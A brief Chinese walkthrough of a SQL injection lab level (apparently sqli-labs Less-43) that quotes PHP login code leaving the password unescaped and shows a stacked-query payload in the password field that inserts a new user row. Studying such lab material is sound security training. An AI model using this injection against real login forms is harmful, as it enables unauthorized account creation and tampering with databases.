本关与42关的原理基本一致,我们还是定位在login.php中的password。关键代码:
$username = mysqli_real_escape_string($con1, $_POST["login_user"]); $password = $_POST["login_password"]; $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
登录:username:admin
Password:c');insert into users(id,username,password) values('43','less43','hello')#
可以看到成功创建了一个新用户。
其他的操作这里就不进行演示了。